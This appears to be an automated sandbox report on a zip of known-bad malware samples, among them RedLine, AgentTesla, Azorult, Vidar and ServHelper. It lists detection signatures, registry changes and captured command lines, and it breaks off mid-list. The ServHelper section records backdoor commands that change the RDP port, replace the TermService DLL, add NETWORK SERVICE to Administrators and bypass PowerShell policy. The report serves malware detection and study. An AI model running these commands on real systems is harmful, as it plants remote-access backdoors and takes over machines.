Analysis Overview
SHA256
2214bdc78b558176a17484bcc02079a5470e0b49073d50d19b522d67dc4396e3
Threat Level: Known bad
The file 4.zip was found to be: Known bad.
Malicious Activity Summary
RedLine
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
AgentTesla
Azorult
Snake Keylogger
Vidar
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
WarzoneRat, AveMaria
Guloader,Cloudeye
Process spawned unexpected child process
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
Gozi_ifsb family
RedLine Payload
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
ServHelper
Grants admin privileges
AgentTesla Payload
Vidar Stealer
Executes dropped EXE
Sets DLL path for service in the registry
Patched UPX-packed file
UPX packed file
Modifies RDP port number used by Windows
Modifies extensions of user files
VMProtect packed file
Blocklisted process makes network request
Drops file in Drivers directory
Possible privilege escalation attempt
Downloads MZ/PE file
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Deletes itself
Modifies file permissions
Checks computer location settings
Writes to the Master Boot Record (MBR)
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Adds Run key to start application
Accesses 2FA software files, possible credential harvesting
Checks installed software on the system
Modifies WinLogon
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Kills process with taskkill
Checks processor information in registry
Modifies registry key
Runs net.exe
Modifies data under HKEY_USERS
NTFS ADS
Enumerates system info in registry
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Modifies system certificate store
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Script User-Agent
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-07-30 15:26
Signatures
Gozi_ifsb family
Patched UPX-packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral12
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
12s
Max time network
58s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
"C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe"
Network
Files
memory/1100-62-0x0000000000290000-0x00000000002A3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
151s
Max time network
163s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\MAPPINGS\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502\CHILDREN | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502\Moniker = "oice_16_974fa576_32c1d314_1e11" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_1e11 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_1e11 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_1e11\Children | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\STORAGE\OICE_16_974FA576_32C1D314_1E11\CHILDREN | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502\DisplayName = "OICE_16_974FA576_32C1D314_1E11" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502\Children | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\{683C9910-647D-49CA-B8ED-A9F2AE771570}\abdtfhghgdghghœ.ScT:Zone.Identifier | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 784 wrote to memory of 3644 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE |
| PID 784 wrote to memory of 3644 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf" /o ""
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE
"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE" C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Network
Files
memory/784-117-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-118-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-119-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-120-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-121-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-122-0x00007FFDF8250000-0x00007FFDFAD73000-memory.dmp
memory/784-125-0x00007FFDF4780000-0x00007FFDF586E000-memory.dmp
memory/784-126-0x00007FFDF2250000-0x00007FFDF4145000-memory.dmp
memory/3644-363-0x0000000000000000-mapping.dmp
memory/3644-365-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/3644-366-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/3644-367-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_1e11\AC\Temp\FLD509.tmp
| MD5 | 263ff32cc8b100ddcef2fede237bdcbb |
| SHA1 | 3faab71d14c778b6d7090e508dc68c6fc1a738fe |
| SHA256 | acb51bb46e7b6f5c713c68b63c9193516fae376b7214fb102700d08097ad33e2 |
| SHA512 | bde84fc92350935f7e5e4edc15095568bb33463ce427a97d54b28d4873231ee70cfea682aae75f0d50d9ad9bc4bd986bc8a529b71ff3dcbbeb450e48b9b273fe |
memory/3644-369-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:34
Platform
win7v20210410
Max time kernel
137s
Max time network
82s
Command Line
Signatures
ServHelper
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe1.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\Wondershare\NFWCHK.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a74ffc7-9cca-4845-bd46-8ff96c4ac43f | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c0b142a5-2b59-45fd-a99b-ce1f142c850f | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_55dbdebd-e428-42e4-82e2-2ef0cdfc7458 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd10f91-0b5f-40f7-b451-e272660bae5d | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac761484-0ecd-4b05-83ec-285cc54d0e96 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90ab2bf7-a5b2-485f-bbb1-f5e3aeea5b24 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_578ff6f3-25c8-4688-81c3-ff3e7179e5c3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z2QY7QFOTGMKT0BUNU70.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0bb34e5-3a6d-4514-8e04-07c75cc5c314 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abd106a9-f5f6-41e9-b78b-a62c298b662f | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c4a40091-f455-420c-bbdd-90c865751b3b | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c695c2dd-95c9-457e-b147-d950bcde996e | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80bafa925785d701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A21.tmp" "c:\Users\Admin\AppData\Local\Temp\5sxesnat\CSCC91B983069BF4F51BD1C6A36E5BB7AD.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
